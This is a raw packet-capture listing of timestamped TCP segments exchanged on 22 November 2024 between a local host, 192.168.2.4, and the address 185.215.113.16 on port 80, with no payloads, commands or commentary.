Nov 22, 2024 20:35:39.328617096 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.329595089 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.329725027 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.329767942 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.330678940 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.334239960 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.463426113 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.463464022 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.463610888 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.463664055 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.463706017 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.463742018 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.464045048 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.464751959 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.464797974 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.464801073 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.464843035 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.465600014 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.465651035 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.465778112 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.465825081 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.466728926 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.466775894 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.466851950 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.466897964 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.467895985 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.467989922 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.468043089 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.468998909 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.469118118 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.469178915 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.470140934 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.470246077 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.470302105 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.471290112 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.471338987 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.471404076 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.472414017 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.472481966 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.472534895 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.473548889 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.473593950 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.473664045 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.473704100 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.474663019 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.474764109 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.474839926 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.475785017 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.475894928 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.475956917 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.476933002 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.476999998 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.477006912 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.478044987 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.478110075 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.478169918 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.479274988 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.479331970 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.479523897 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.479566097 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.480391979 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.480434895 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.480479956 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.481462955 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.481578112 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.481623888 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.482634068 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.482703924 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.482743979 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.483784914 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.483827114 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.483859062 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.484905958 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.484947920 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.485003948 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.485984087 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.486021996 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.486085892 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.487194061 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.487230062 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.487238884 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.487267017 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.488327980 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.488471985 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.488517046 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.489411116 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.489459991 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.489496946 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.489851952 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.490542889 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.490587950 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.490592003 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.490636110 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.491683960 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.491801023 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.491828918 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.491848946 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.492841005 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.492885113 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.492935896 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.493943930 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.494097948 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.494118929 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.494143963 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.495109081 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.495244026 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.495294094 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.496193886 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.496340036 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.496386051 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.497385025 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.497431993 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.497437954 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.498106956 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.498473883 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.498584986 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.498620033 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.499612093 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.499712944 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.499752045 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.500797033 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.500890970 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.500929117 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.502207994 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.502378941 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.502423048 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.502998114 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.503036976 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.503114939 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.504154921 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.504201889 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.504266024 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.505295992 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.505345106 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.505386114 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.506118059 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.506416082 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.506505966 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.506547928 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.507641077 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.507704020 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.507718086 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.507936954 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.508644104 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.508706093 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.508745909 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.509881020 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.509937048 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.509989023 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.510122061 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.510919094 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.511044025 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.511092901 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.512098074 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.512190104 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.512240887 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.513181925 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.513309956 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.513365030 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.514360905 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.514439106 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.514498949 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.515465021 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.515569925 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.515619040 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.516627073 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.516674995 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.516695023 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.517771006 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.517843008 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.517847061 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.518120050 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.518942118 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.519027948 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.519077063 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.520010948 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.520101070 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.520149946 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.521128893 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.521178007 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.521265030 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.522113085 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.522268057 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.522306919 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.522315025 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.522355080 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.655592918 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.655673981 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.655775070 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.655819893 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.655931950 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.655975103 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.656987906 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.657030106 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.657083988 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.658108950 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.658111095 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.658147097 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.658152103 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.658185005 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.659399986 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.659528971 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.659569979 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.660442114 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.660866976 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.660912991 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.661505938 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.661545038 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.661581993 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.662120104 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.662635088 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.662682056 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.662725925 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.663760900 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.663810015 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.663933039 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.664940119 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.664989948 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.664999962 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.665997982 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.666040897 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.666104078 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.666188002 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.667130947 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.667249918 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.667289972 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.668277979 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.668317080 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.668354988 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.669429064 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.669467926 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.669517994 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.670109987 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.670527935 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.670563936 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.670641899 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.671684980 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.671722889 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.671758890 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.672785044 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.672827959 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.672884941 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.672914982 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.673990965 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.674031019 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.674069881 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.674103975 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.675086975 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.675136089 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.675168991 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.675199986 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.676316977 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.676419020 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.676461935 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.677333117 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.677440882 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.677485943 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.678462982 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.678570032 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.678610086 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.679606915 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.679702044 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.679738998 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.680810928 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.680856943 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.680896997 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.681864977 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.681904078 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.681967974 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.682107925 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.683005095 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.683046103 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.683113098 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.683146954 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.684127092 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.684237957 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.684268951 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.685260057 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.685358047 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.685398102 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.686393976 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.686525106 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.686562061 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.687740088 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.687877893 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.687917948 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.688648939 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.688766003 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.688803911 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.689830065 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.689886093 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.689949989 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.690107107 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.690931082 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.691040993 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.691078901 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.692038059 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.692120075 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.692162991 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.693002939 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.693130016 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.693161964 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.693854094 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.693950891 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.693984985 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.694936037 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.695065022 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.695102930 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.696116924 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.696156025 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.696228027 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.697238922 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.697277069 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.697319984 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.698105097 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.698369980 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.698473930 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.698508024 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.699538946 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.699707985 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.699744940 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.700666904 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.700710058 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.700740099 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.701762915 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.701801062 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.701857090 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.702111006 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.702886105 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.702982903 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.703011990 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.704046011 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.704174995 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.704227924 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.705128908 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.705171108 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.705239058 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.706104994 CET	49759	80	192.168.2.4	185.215.113.16
Nov 22, 2024 20:35:39.706326962 CET	80	49759	185.215.113.16	192.168.2.4
Nov 22, 2024 20:35:39.706360102 CET	49759	80	192.168.2.4	185.215.113.16
